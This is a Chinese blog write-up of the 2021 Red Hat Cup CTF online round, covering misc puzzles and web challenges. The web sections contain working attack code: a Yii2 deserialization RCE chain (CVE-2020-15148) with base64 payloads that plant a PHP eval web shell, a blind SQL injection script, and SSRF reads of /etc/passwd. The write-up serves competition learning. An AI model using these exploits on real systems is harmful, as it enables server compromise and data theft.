2021第四届红帽杯网络安全大赛-线上赛Writeup

于 2021-05-10 04:55:03 发布 9959 收藏 81
分类专栏: CTF_WEB_Writeup 文章标签: 2021redhat 第四届红帽杯 Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/116570606
版权

文章目录

记录一下被锤爆的一天…orz

MISC

签到

在这里插入图片描述
签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。

附件名称叫EBCDIC.zip

010Editor直接选择EBCDIC编码
在这里插入图片描述
在这里插入图片描述

flag{we1c0me_t0_redhat2021}

colorful code

在这里插入图片描述
这题可惜了,当我想出来怎么做的时候,已经没有时间来写脚本了…

首先题目名称提示:colorful code,这点当时第一时间想到了前段时间安恒赛misc有一题colorful porgramming
在这里插入图片描述
colorful porgramming详情见:https://www.bertnase.de/npiet/

附件中data1是文本文件,data2是数据文件,用hexdump查看如下
在这里插入图片描述
data1中是0-19的数字,用空格分开。也看不出什么别的(当时在这浪费了比较多的时间)。
在这里插入图片描述
data1暂时也看不出来和图片有什么关系,所以图片的线索在data2
在这里插入图片描述
咋一看也和图片没什关系,但是当我们将每一个字节的十六进制转换成RGB十进制,三个一组

from binascii import *

with open('data2','rb') as f:
    f = hexlify(f.read()).decode()
    n = 0
    color_list = []
    for i in range(0,len(f),2):
        i = f[i:i+2]
        color_list.append(int(i,16))
        n += 1
        if n == 3:
            print(tuple(color_list))
            color_list = []
            n = 0
        else:
            continue

运行结果

PS C:\Users\Administrator\Downloads\colorful_code-1> python .\code.py
(0, 0, 0)
(0, 0, 192)
(0, 255, 255)
(0, 255, 0)
(255, 192, 255)
(255, 192, 192)
(192, 192, 255)
(192, 192, 0)
(255, 0, 255)
(255, 0, 0)
(192, 0, 0)
(192, 0, 192)
(255, 255, 255)
(255, 255, 0)
(255, 255, 192)
(0, 192, 0)
(0, 192, 192)
(192, 255, 255)
(192, 255, 192)
(0, 0, 255)
(20, 20, 20)
(21, 21, 21)
(22, 22, 22)
(23, 23, 23)
(24, 24, 24)
(25, 25, 25)
.......
(250, 250, 250)
(251, 251, 251)
(252, 252, 252)
(253, 253, 253)
(254, 254, 254)
(255, 255, 255)

很明显,前20组数据和后面的数据不太一样。然后联想到前面data1中只有0-19的数字,猜测data10-19应该是对应data2种这二十组像素数据的下标。

OK,那么思路到这里就很清楚了。我们将这二十组RGB像素,按照data1中的顺序,将这些像素putpixel()即可。

思考到这里的时候还有最后一个问题,那就是生成的图片的宽高。要知道宽高,我们首先要知道图片的总像素,总像素,直接计算下data1中有多少个0-19数字。

Python简单处理

def str2list():
    with open('data1.txt') as f:
        f = f.read()
        index_list = f.split(' ')
        return index_list

print(str2list())
print(len(str2list()))

在这里插入图片描述
这里需要注意,因为data1最后有两个空格,所以会切多一个元素出来,去掉即可。所以这里总像素是:7067

7067看起来不像是一个比较常见的图片总像素数,不太好计算,直接在线分解质因数得到宽高

分解质因数:http://tools.jb51.net/jisuanqi/factor_calc

在这里插入图片描述
就先推测宽为: 37,高为: 191

OK,接下来直接Python简单处理下即可得到flag.png

# -*- coding:utf-8 -*-
# Author: mochu7
from PIL import Image
from binascii import *

def str2list():
    with open('data1','r') as f:
        f = f.read()
        index_list = f.split(' ')[:-1]
        return index_list

def num2color():
    with open('data2','rb') as f:
        f = hexlify(f.read()).decode()
        n = 0
        idx = 0
        color_dic = {}
        color_list = []
        for i in range(0,len(f),2):
            i = f[i:i+2]
            color_list.append(int(i,16))
            n += 1
            if n == 3:
                color_dic[idx] = tuple(color_list)
                color_list = []
                n = 0
                idx += 1
            elif idx == 20:
                break
    return color_dic

def genimg():
    width, height = 37, 191
    img = Image.new("RGB",(width,height))
    imgpixels = str2list()
    colorlist = num2color()
    pixlist = []
    for pix in imgpixels:
        pixlist.append(colorlist[int(pix)])
    idx = 0
    for w in range(width):
        for h in range(height):
            img.putpixel([w,h], pixlist[idx])
            idx += 1
    img.save('flag.png')


if __name__ == '__main__':
    # print(len(str2list()))
    # print(num2color())
    genimg()

在这里插入图片描述
npiet onlinehttps://www.bertnase.de/npiet/npiet-execute.php

在这里插入图片描述
得到flag

flag{88842f20-fb8c-45c9-ae8f-36135b6a0f11}

WEB

find_it

在这里插入图片描述
在这里插入图片描述
目录扫描发现robots.txt
在这里插入图片描述
存在1ndexx.php,直接访问并没有什么信息。猜测存在vim备份文件
访问view-source:http://eci-2zefc95c45rhg0wuefre.cloudeci1.ichunqiu.com/.1ndexx.php.swp拿到源码

<?php $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}

	#logo {
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1><?php echo "Hello My freind!"; ?></h1>
	<?php if($link) { ?>
		<h2>I Can't view my php files?!</h2>
	<?php } else { ?>
		<h2>MySQL Server version: <?php echo mysql_get_server_info(); ?></h2>
	<?php } ?>
</body>
</html>
<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

正则没有忽略大小写,本来是怎么想办法怎么绕过disable_functionflag.php的,但是写入查看phpinfo()的时候发现

/index.php?code=<?=phpinfo();?>

访问hack.php
发现flag被记录进了phpinfo的全局变量里,送分了
在这里插入图片描述
这题应该非预期了

framework

在这里插入图片描述
在这里插入图片描述
Yii框架,目录扫描发现www.zip
在这里插入图片描述
源码中简单看了下,知道这是Yii2框架,搜索引擎找一下如何查看Yii2的版本
在这里插入图片描述
本地调试,在web/index.php中添加一行echo Yii::getVersion();
在这里插入图片描述
在这里插入图片描述
得到当前版本信息:2.0.32

搜索引擎找这个版本或者更高版本的漏洞

最后发现是一个CVE-2020-15148的反序列化RCE

网上相关利用文章很多,我参考的是以下两篇:

在这里插入图片描述
在这里插入图片描述

/index.php?r=site/about&message=GET%20/r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19

得到一个不完整的phpinfo
在这里插入图片描述
之后测试的时候,发现systemeval之类的一些函数好像都没有效果,猜测可能设置了disable_functions

不过最后发现assert能用、file_put_contents()也能用

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents(\'mochu7.php\',\'<?php eval($_POST[7]);?>\');';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

/index.php?r=site/about&message=GET%20/r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjU5OiJmaWxlX3B1dF9jb250ZW50cygnbW9jaHU3LnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzddKTs/PicpOyI7fWk6MTtzOjM6InJ1biI7fX19fQ==

在这里插入图片描述
上蚁剑,用插件。
phpinfo的信息显示这里是Apache/2.4.6 (CentOS) PHP/5.6.40
选择Apache_mod_cgi
在这里插入图片描述

WebsiteManger

在这里插入图片描述
在这里插入图片描述
查看源码
在这里插入图片描述
图片的id貌似是跟数据库存在交互的
在这里插入图片描述
长度177的都是被过滤的关键字

布尔盲注

/image.php?id=if(1=1,1,5)	True
/image.php?id=if(1=2,1,5)	False

条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可作为布尔盲注判断条件

编写简单的Python盲注脚本

import string
from requests import *

allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

myurl = 'http://eci-2ze8j3xqhbs4y2thbqra.cloudeci1.ichunqiu.com/image.php'

info = ''
for i in range(1,50):
    for s in allstr:
        payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i,ord(s))
        resp = get(url=myurl+payload)
        if len(resp.text) > 4000:
             info += s
             print(info)

payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i,ord(s))

payload = '?id=if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=\'ctf\'),{},1))={},1,5)'.format(i,ord(s))

payload = '?id=if(ascii(mid((select/**/group_concat(username,password)/**/from/**/ctf.users),{},1))={},1,5)'.format(i,ord(s))

注入查询到信息

Current_database: ctf

Tables_in_ctf: images,users

Columns_in_users: username,password

在这里插入图片描述
得到账户admin,密码441cc8327a306b48b7a32

登录admin
在这里插入图片描述
curl.php这里应该存在SSRF

尝试file://协议去读文件

file:///etc/passwd

在这里插入图片描述
在这里插入图片描述
直接读file:///flag
在这里插入图片描述

ezlight

下面到了膜大佬时刻
orz…orz…orz…orz…orz…orz…orz…
Y1ngyyds!!!
https://www.gem-love.com/websecurity/2763.html

末初mochu7
关注
  • 37
    点赞
  • 81
    收藏
  • 打赏
    打赏
  • 29
    评论
专栏目录
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
2021红帽杯 find_it
LYJ20010728的博客
06-22 825
2021红帽杯 find_it考点思路Payload 考点 备份文件、源码泄露 思路 题目提示我们 I Can't view my php files?!,猜测是备份文件,御剑扫一下发现存在 robots.txt 访问 1ndexx.php,发现并不存在;由于Linux平台下的存在 .xxxx.php.swp、.xxxx.php.swo、.xxxx.php等文件格式,尝试访问一下 .1ndexx.php.swp,存在源码泄露 发现过滤了一堆东西,感觉没得啥子可以利用的点了,由于可以写入文件,
CTF —— 网络安全大赛
最新发布
javagty6778的博客
03-11 3944
前言随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。‍ ‍ ‍ 网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛。
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 3940
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
2019红帽杯(RedHat)【Broadcastc & 恶臭的数据包】writeup
chen574927274的博客
11-11 2595
首先请原谅我这么菜,只解了两道题还来发Blog; 【Broadcastc】 这题不多说,直接解压得到task.py打开获取flag 【恶臭的数据包】 首先下载压缩包解压得到数据包 Wireshark打开什么都看不懂,直接百度; 按照教程 把数据包丢到Kali 先看看ESSID 然后再破解WiFi密码 得到WiFi密码 12345678 打开Wireshark 编辑-...
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger
weixin_40872714的博客
03-26 1117
CTFHub_2021-第四届红帽杯网络安全大赛-Web-WebsiteManger(布尔盲注、SSRF ) 场景描述:最新的网站测试器,作为非站长的你,能利用好它的功能吗? 场景打开后,如下,是个登录框 查看源码,发现可能的注入点 /image.php?id=2 布尔盲注 /image.php?id=if(1=1,1,5) True /image.php?id=if(1=2,1,5) False 条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可
红帽杯2021 Misc
LYJ20010728的博客
05-10 424
红帽杯2021 Misc签到colorful codePicPic 签到 根据附件文件名EBCDIC,可知是编码问题,转换即可,这里可以采用 010 Editor flag为flag{we1c0me_t0_redhat2021} colorful code 压缩包解压后得到两个data文件,试了下找不到什么有用的东西,想到题目名字,发现文件data2用十六进制查看符合颜色的十六进制编码 这里补充一个使用颜色编写代码的知识点,该题就用到了这个点Piet 从图中可以看出在前面的十六进制中是没有规律
通过几道CTF题学习yii2框架
m0_59598029的博客
02-11 38
Yii是一套基于组件、用于开发大型 Web 应用的高性能 PHP 框架,之前的版本存在反序列化漏洞,程序在调用时,攻击者可通过构造特定的恶意请求执行任意命令,本篇就分析一下yii2利用链以及如何自己去构造payload,并结合CTF题目去学习yii2框架。
菜狗杯Misc抽象画wp
Altering_Ji的博客
12-01 364
菜狗杯Misc抽象画wp
Piet一种奇葩编程语言——利用在CTF中Piet的套路应该很多
Mark的博客
12-08 1357
目录前言一、Piet是什么?二、使用工具编译Piet图片三、使用工具对其图片进行解释1.使用老版本windows工具2.更多的链接npiet用于piet程序的解释器piet程序例子1piet程序例子2piet程序例子3更多思路 前言 要不是因为做到一个杂项题,我估计这辈子也不会了解到这个奇葩语言,简单的说一下这个语言便是用色块来构造程序,也是够另类的,能想出来的人确实????????! 一、Piet是什么? 官方介绍: Introduction: Piet is a programming lang
红帽杯linux开发者大赛,广东省红帽杯攻防大赛WriteUp
weixin_39572316的博客
05-15 90
1.Misc关注公众号"pen_test"回复"ctf"获取flag看题目提示想到是brainfuck在线解密即可:+++++ +++++ [->++ +++++ +++++.+ +++++ .-- -- -.+++ +++.<++++[ ->+++ ++ +++.< ++++[ ->--- -- ----- .---- ------- ----- -.+.- ..-...
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
2017年(第三届)陕西省网络空间安全技术大赛 线上赛官方 Writeup 解题思路
04-27
2017年(第三届)陕西省网络空间安全技术大赛 线上赛官方 Writeup 解题思路 主办单位:陕西省兵工学会 承办单位:西安工业大学 协办单位:西安胡门网络技术有限公司
2021一带一路暨金砖大赛之企业信息系统安全赛项AWD-writeup(解析)
12-18
通过赛项检验参赛选手网络组建、安全架构和网络安全运维管控等 方面的技术技能,检验参赛队组织和团队协作等综合职业素养,培养学 生创新能力和实践动手能力,提升学生职业能力和就业竞争力。通过大 赛引领专业教学...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
第三届上海大学生网络安全赛(线上赛)-MS1战队-Writeup
01-20
ctf write up 第三届上海大学生网络安全赛(线上赛)-MS1战队
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it
Anton__1的博客
05-12 2435
[CTFHub] 2021-第四届红帽杯网络安全大赛-Web-find_it 看群里说CTFHub上复现了, 我来看看 本来想按照红帽杯的套路来试一下,发现phpinfo里莫得flag了 只能想想其他办法咯 <?php #Really easy... $file=fopen("flag.php","r") or die("Unable 2 open!"); $I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize(
2021红帽杯线上解题记录
shutdown -s -t
11-28 2973
签到 如题目名称提示,需要进行ebcdic编码,python原生不支持,安装额外库pip install ebcdic。python3解码脚本如下: import ebcdic with open('EBCDIC.txt', 'rb') as f: tmp = f.read() print(tmp.decode('cp1141')) 输出内容flagäwe1c0me_t0_redhat2021ü,调整一下flag{we1c0me_t0_redhat2021}。 find-it flag
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9586
前言 记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 29
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

谢谢老板!

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值